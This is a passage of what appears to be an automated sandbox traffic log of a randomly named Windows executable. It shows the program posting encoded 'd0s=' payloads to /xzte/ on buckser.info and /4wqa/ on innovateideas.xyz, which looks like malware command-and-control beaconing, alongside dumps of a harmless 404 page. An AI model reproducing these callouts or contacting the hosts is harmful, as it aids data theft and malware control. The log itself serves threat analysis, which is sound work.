6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0; } body,html { height: 100%; text-align: center; font-family: -apple-system, BlinkMacSystemFont, YakuHanJP, Helvetica, , "Hiragino Sans", " ProN W3", "Hiragino Kaku Gothic ProN", Verdana, Meiryo, sans-serif; background: #fff; color: #403230; } .container { padding: 60px 30px; } @media screen and (min-width: 640px) { .container { padding: 100px 30px; } } h1 { letter-spacing: 0.05em; font-size: 2.4rem; margin-bottom: 20px; } a { color: #147EF0; } .lol-error-page__caption { text-align: center; font-size: 1rem; [TRUNCATED]
Nov 27, 2024 08:55:53.964051962 CET	404	IN	Data Raw: 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a Data Ascii: line-height: 1.72; } .lol-error-page__information { display: -webkit-flex; display: -ms-flexbox; display: flex; -webkit-justify-content: center; -ms-flex-pack: center; jus
Nov 27, 2024 08:55:53.964063883 CET	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 77 72 61 70 3a 20 77 72 61 70 3b 0a 20 20 20 20 20 20 20 20 20 20 66 6c 65 78 2d 77 72 61 70 3a 20 77 72 61 70 3b 0a 20 20 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 36 34 30 Data Ascii: -ms-flex-wrap: wrap; flex-wrap: wrap; max-width: 640px; margin: 20px auto; } @media screen and (min-width: 640px) { .lol-error-page__information { -webkit-flex-wrap: nowrap;
Nov 27, 2024 08:55:53.964128017 CET	1236	IN	Data Raw: 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0a 20 20 20 20 20 20 20 20 62 6f 74 74 6f 6d 3a 20 2d 38 70 78 3b 0a 20 20 20 20 20 20 20 20 6c 65 66 74 3a 20 63 61 6c 63 28 Data Ascii: position: absolute; z-index: 1; bottom: -8px; left: calc(50% - 10px); display: block; width: 0; content: ''; border-width: 10px 8px 0; border-style: solid; border-color:
Nov 27, 2024 08:55:53.964139938 CET	1236	IN	Data Raw: 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 6c Data Ascii: margin: auto; } @media screen and (min-width: 640px) { .lol-error-page__ad-banner-holizontal { display: inline; float: left; } } .lol-error-page__ad-banner-holizontal-right {
Nov 27, 2024 08:55:53.964152098 CET	1236	IN	Data Raw: 34 2d 32 39 2e 39 2d 31 32 2e 30 34 68 2d 2e 33 32 39 63 2d 31 34 2e 31 20 30 2d 32 34 2e 33 31 37 20 33 2e 39 38 38 2d 33 30 2e 31 35 33 20 31 31 2e 38 36 2d 39 2e 34 20 31 32 2e 35 30 37 2d 34 2e 34 38 39 20 33 30 2e 30 31 31 2d 34 2e 33 20 33 Data Ascii: 4-29.9-12.04h-.329c-14.1 0-24.317 3.988-30.153 11.86-9.4 12.507-4.489 30.011-4.3 30.748.052.166.127.323.224.467-.326 3.036-.826 6.051-1.5 9.03-1.691 7.962-3.442 16.209 1.5 22.44 4.942 6.231 15.69 9.155 33.7 9.226h.718c17.583 0 28.1-2.845 33.05
Nov 27, 2024 08:55:53.964164972 CET	848	IN	Data Raw: 37 63 2d 2e 34 36 33 20 30 2d 2e 39 30 38 2d 2e 31 37 39 2d 31 2e 32 34 32 2d 2e 35 6c 2d 31 31 2e 30 34 34 2d 31 30 2e 35 32 37 63 2d 2e 34 30 31 2d 2e 33 39 2d 2e 36 2d 2e 39 34 34 2d 2e 35 33 39 2d 31 2e 35 6c 32 2e 39 39 33 2d 32 33 2e 38 38 Data Ascii: 7c-.463 0-.908-.179-1.242-.5l-11.044-10.527c-.401-.39-.6-.944-.539-1.5l2.993-23.885c.111-.9.874-1.577 1.781-1.58h16.521c.887-.001 1.643.644 1.781 1.52l2.992 23.972c.054.561-.156 1.116-.569 1.5l-11.417 10.538c-.343.311-.794.476-1.257.462z"/><pa
Nov 27, 2024 08:55:53.964356899 CET	1236	IN	Data Raw: 32 20 31 2e 38 33 37 2e 36 36 32 20 32 2e 38 31 33 2e 37 30 37 68 2e 37 33 33 63 32 2e 35 37 36 2e 31 34 32 20 35 2e 30 30 36 2d 31 2e 32 30 31 20 36 2e 32 35 35 2d 33 2e 34 35 38 20 31 2e 31 34 34 2d 32 2e 33 39 39 20 31 2e 37 34 36 2d 35 2e 30 Data Ascii: 2 1.837.662 2.813.707h.733c2.576.142 5.006-1.201 6.255-3.458 1.144-2.399 1.746-5.019 1.766-7.676.265-2.556-.016-5.139-.823-7.578zm-62.16 14.494c-.516.39-1.154.583-1.8.542-1.444.307-2.918-.373-3.621-1.671-.824-1.932-1.246-4.011-1.241-6.111-.389
Nov 27, 2024 08:55:53.964370012 CET	1236	IN	Data Raw: 2d 31 33 2e 38 20 32 34 2e 32 34 32 2d 33 30 2e 31 39 31 2e 30 31 33 2d 34 2e 33 38 37 2d 2e 38 33 36 2d 38 2e 37 33 34 2d 32 2e 35 2d 31 32 2e 37 39 33 2d 31 32 2e 32 32 35 2e 34 30 37 2d 32 36 2e 39 33 35 2d 32 2e 36 39 34 2d 33 34 2e 33 34 32 Data Ascii: -13.8 24.242-30.191.013-4.387-.836-8.734-2.5-12.793-12.225.407-26.935-2.694-34.342-10.43z"/><path fill="#f60" d="M39.256 44.625c-1.8 0-3.2 1.776-3.217 4.064-.017 2.288 1.392 4.079 3.172 4.094 1.78.015 3.2-1.776 3.217-4.064.017-2.288-1.376-4.07
Nov 27, 2024 08:55:53.964462042 CET	1236	IN	Data Raw: 2e 32 39 20 35 38 2e 39 30 38 6c 2d 32 2e 33 31 39 2d 32 2e 39 32 73 32 2e 33 39 34 2d 34 2e 32 35 39 20 32 2e 33 39 34 2d 37 2e 32 35 34 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 36 30 22 20 64 3d 22 4d 35 32 2e 33 36 35 20 36 30 2e 37 Data Ascii: .29 58.908l-2.319-2.92s2.394-4.259 2.394-7.254"/><path fill="#f60" d="M52.365 60.714c-.548.001-1.066-.248-1.407-.677l-2.319-2.92c-.455-.579-.514-1.377-.15-2.017 1.141-1.931 1.865-4.079 2.125-6.306-.016-.481.16-.949.489-1.3.494-.533 1.264-.71 1
Nov 27, 2024 08:55:54.084208012 CET	1236	IN	Data Raw: 2d 2e 37 33 20 31 2e 31 37 38 63 2d 2e 33 36 31 2e 36 2d 2e 37 33 39 20 31 2e 31 35 33 2d 31 2e 30 39 33 20 31 2e 36 35 37 6c 2d 2e 32 30 38 2e 33 63 2d 2e 33 37 39 2e 35 32 33 2d 2e 37 33 31 20 31 2d 31 2e 30 38 34 20 31 2e 34 34 38 6c 2d 2e 34 Data Ascii: -.73 1.178c-.361.6-.739 1.153-1.093 1.657l-.208.3c-.379.523-.731 1-1.084 1.448l-.447.542c-.335.411-.674.784-1 1.142-.74.789-1.536 1.524-2.381 2.2l-.273.218-9.572-.005zm5-10.2c-.405-.001-.801.124-1.133.356-.683.482-1.001 1.333-.8 2.145.023.126.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49950	120.26.240.121	80	2340	C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 27, 2024 08:56:01.072271109 CET	789	OUT	POST /xzte/ HTTP/1.1 Host: www.buckser.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US Origin: http://www.buckser.info Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 216 Connection: close Referer: http://www.buckser.info/xzte/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS) Data Raw: 64 30 73 3d 54 4e 4f 42 62 38 56 63 38 54 52 6a 34 71 67 75 54 69 4e 63 6c 4d 64 44 56 46 76 56 63 4b 51 5a 44 59 66 67 49 4e 50 32 32 50 34 51 62 51 31 50 69 72 72 61 72 74 37 69 76 65 47 74 2f 49 67 72 42 42 52 6e 51 56 38 43 61 38 5a 38 6f 44 57 52 36 58 39 32 75 36 61 35 33 66 6b 74 6b 73 38 71 4c 4e 4c 41 77 4b 42 73 35 70 64 61 46 51 50 4f 33 54 59 51 56 31 63 33 64 44 63 65 6d 77 55 79 6d 36 6f 35 35 2f 52 31 4a 38 6d 4d 31 61 64 59 35 38 6d 4a 55 65 6f 30 31 65 44 59 47 70 77 67 39 32 33 4a 78 57 44 6e 64 6c 39 5a 6d 51 49 7a 52 49 65 53 4c 45 35 6d 43 31 6b 73 6a 6f 31 73 76 6d 66 46 37 6a 43 35 4e 74 52 4f 37 38 62 54 73 41 3d 3d Data Ascii: d0s=TNOBb8Vc8TRj4qguTiNclMdDVFvVcKQZDYfgINP22P4QbQ1Pirrart7iveGt/IgrBBRnQV8Ca8Z8oDWR6X92u6a53fktks8qLNLAwKBs5pdaFQPO3TYQV1c3dDcemwUym6o55/R1J8mM1adY58mJUeo01eDYGpwg923JxWDndl9ZmQIzRIeSLE5mC1ksjo1svmfF7jC5NtRO78bTsA==
Nov 27, 2024 08:56:02.648123026 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 [TRUNCATED] Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000004252206681"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49956	120.26.240.121	80	2340	C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 27, 2024 08:56:03.744219065 CET	809	OUT	POST /xzte/ HTTP/1.1 Host: www.buckser.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US Origin: http://www.buckser.info Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 236 Connection: close Referer: http://www.buckser.info/xzte/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS) Data Raw: 64 30 73 3d 54 4e 4f 42 62 38 56 63 38 54 52 6a 34 4f 63 75 49 42 6c 63 74 4d 64 41 4a 56 76 56 56 71 51 64 44 59 44 67 49 50 6a 6d 71 74 73 51 63 78 46 50 6a 70 44 61 71 74 37 69 6b 2b 47 6b 67 59 67 69 42 42 4d 61 51 52 38 43 61 38 39 38 6f 42 4f 52 36 47 39 35 73 71 61 37 38 2f 6b 72 35 63 38 71 4c 4e 4c 41 77 4b 45 42 35 70 56 61 45 6a 6e 4f 32 79 59 58 57 31 63 6f 4e 54 63 65 73 51 55 32 6d 36 6f 62 35 2b 4e 54 4a 2b 4f 4d 31 59 56 59 35 75 43 49 50 75 6f 79 6f 4f 43 4a 4b 73 5a 4e 36 47 6e 5a 7a 47 66 67 45 43 38 6d 71 47 4a 52 4c 71 53 2b 56 56 42 64 47 33 41 61 30 4f 6f 5a 74 6e 62 64 32 42 32 59 53 61 30 6b 32 75 36 58 36 35 7a 52 31 68 34 6b 76 4f 44 61 33 39 43 44 70 35 37 56 4b 55 63 3d Data Ascii: d0s=TNOBb8Vc8TRj4OcuIBlctMdAJVvVVqQdDYDgIPjmqtsQcxFPjpDaqt7ik+GkgYgiBBMaQR8Ca898oBOR6G95sqa78/kr5c8qLNLAwKEB5pVaEjnO2yYXW1coNTcesQU2m6ob5+NTJ+OM1YVY5uCIPuoyoOCJKsZN6GnZzGfgEC8mqGJRLqS+VVBdG3Aa0OoZtnbd2B2YSa0k2u6X65zR1h4kvODa39CDp57VKUc=
Nov 27, 2024 08:56:05.304394007 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 [TRUNCATED] Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000004252206681"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49962	120.26.240.121	80	2340	C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 27, 2024 08:56:06.415921926 CET	1822	OUT	POST /xzte/ HTTP/1.1 Host: www.buckser.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US Origin: http://www.buckser.info Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 1248 Connection: close Referer: http://www.buckser.info/xzte/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS) Data Raw: 64 30 73 3d 54 4e 4f 42 62 38 56 63 38 54 52 6a 34 4f 63 75 49 42 6c 63 74 4d 64 41 4a 56 76 56 56 71 51 64 44 59 44 67 49 50 6a 6d 71 74 30 51 62 44 4e 50 69 49 44 61 70 74 37 69 2f 65 47 68 67 59 68 67 42 42 45 65 51 52 34 4e 61 2b 56 38 6e 43 47 52 72 43 4a 35 6c 71 61 37 7a 66 6b 75 6b 73 38 2f 4c 4e 62 45 77 4b 30 42 35 70 56 61 45 6d 6a 4f 6d 54 59 58 51 31 63 33 64 44 64 4b 6d 77 55 65 6d 36 77 68 35 2b 5a 6c 4a 4f 75 4d 31 34 46 59 38 64 6d 49 44 75 6f 77 70 4f 43 52 4b 73 64 4f 36 47 72 76 7a 46 44 4f 45 46 49 6d 6f 79 42 4d 5a 76 79 30 4b 32 31 34 42 42 67 74 7a 64 34 49 30 45 62 46 35 43 50 35 4a 71 55 79 75 59 47 33 2b 63 48 54 6f 53 5a 62 6d 66 37 4a 36 61 72 48 37 61 76 30 57 42 75 72 50 4f 36 38 77 2f 56 79 67 4c 30 78 73 2f 61 6a 70 2b 76 67 39 30 55 66 4d 71 55 58 2f 68 4b 47 4d 6a 55 4f 72 54 4e 38 4d 52 56 76 6b 49 34 43 4f 4f 4c 56 66 6f 2b 4f 65 52 6d 51 56 59 4a 79 4c 71 35 4c 44 6b 35 61 78 50 72 66 76 6a 62 6d 6e 77 4e 53 4a 52 7a 79 67 73 4e 7a 76 33 6b 30 49 58 7a 79 4a 4a [TRUNCATED] Data Ascii: d0s=TNOBb8Vc8TRj4OcuIBlctMdAJVvVVqQdDYDgIPjmqt0QbDNPiIDapt7i/eGhgYhgBBEeQR4Na+V8nCGRrCJ5lqa7zfkuks8/LNbEwK0B5pVaEmjOmTYXQ1c3dDdKmwUem6wh5+ZlJOuM14FY8dmIDuowpOCRKsdO6GrvzFDOEFImoyBMZvy0K214BBgtzd4I0EbF5CP5JqUyuYG3+cHToSZbmf7J6arH7av0WBurPO68w/VygL0xs/ajp+vg90UfMqUX/hKGMjUOrTN8MRVvkI4COOLVfo+OeRmQVYJyLq5LDk5axPrfvjbmnwNSJRzygsNzv3k0IXzyJJBdc6QdK5Kv80NuxGQjAudIqmM5JMjeixCcPL8rrK2TplnFZBTnSHqmBOobk/Ezu63jZQ9EzJawnTALbpa28iHE9utR287E7/7TJxAYXyZb41A4s25wUnXtDOERw3H3YROLVHwKt5NRv8HQLnW3vaF8h/aWhW0ZQShgaUNZl8URZ+KzLLfmwNW6BlA1zXwCFI4D8XliFQC5rJ4CHkOuoTkGvl+KFoGu+kVeMJpYtG4cMQjqKdmyYMbZf6mfVm7sWKgBPo5mfeDbOaboWV5X8EwQowuVEvl0l9HQi2VVT4AF/ZWugZoVulxmGIMXxEAcEGCQzuYszPVfJJ021SwDZC5qlAsaKUJ9m86B12kG96pu8T8RKLyYmYH1AxTQme+M/1Ng2xrLaOwnyoYDMDwal13H7bFLlHTKau9eXCvgPibXi7kxXl4+dm0Uzqi1AVzluFB98nUrAxesNbUbmmchV9ytnNbpZVhEsBng44CnIY4x+FSnpAhU6twJ/Dskcn5XCasjErye+dUTlLYXxAaI2sH+jRB04izW5t0LyiyWhDgFeKDe0IvFaie1OVeL9u4ceDlnYD8XoX6UOeyheWfJkmESQmhaZykiS8wwjK+fOpbGcmqR0NvhIQn/LI8j8fIFn5i+ozHM87MURulFIaCVTt0aG8ETquf3rBU1 [TRUNCATED]
Nov 27, 2024 08:56:07.989901066 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 [TRUNCATED] Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000004252206681"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49970	120.26.240.121	80	2340	C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 27, 2024 08:56:09.064431906 CET	539	OUT	GET /xzte/?Zvd8B=gHrX0lXPMBRt-RA&d0s=ePmhYLVm9S1AwYpTTSZKid9qIij+VYAwULrAeuLQsL02UG94i7HF88rql5COv5lAGhM5DGM0WOZgiTSBkG1OtvSk7+4ip8l/BrXN3KBdu4QudzDN3iYKRjIRKyxXuTAVz68t7cV2ONOD HTTP/1.1 Host: www.buckser.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
Nov 27, 2024 08:56:10.624063969 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 [TRUNCATED] Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000004252206681"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49988	209.74.77.108	80	2340	C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 27, 2024 08:56:16.520050049 CET	804	OUT	POST /4wqa/ HTTP/1.1 Host: www.innovateideas.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US Origin: http://www.innovateideas.xyz Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 216 Connection: close Referer: http://www.innovateideas.xyz/4wqa/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS) Data Raw: 64 30 73 3d 6a 71 74 39 39 4d 6a 57 5a 56 32 6d 78 2b 2f 47 57 2b 4f 4b 43 59 79 2b 74 6e 63 76 2b 2f 58 2b 68 72 71 34 73 70 44 64 57 68 67 36 30 34 44 75 54 7a 41 51 41 75 64 58 63 66 50 30 61 61 46 41 50 69 65 34 76 77 6d 78 4e 6d 6f 47 43 78 52 42 6b 5a 41 34 2b 6e 4a 2f 79 63 4b 53 49 59 4f 4c 44 33 73 34 68 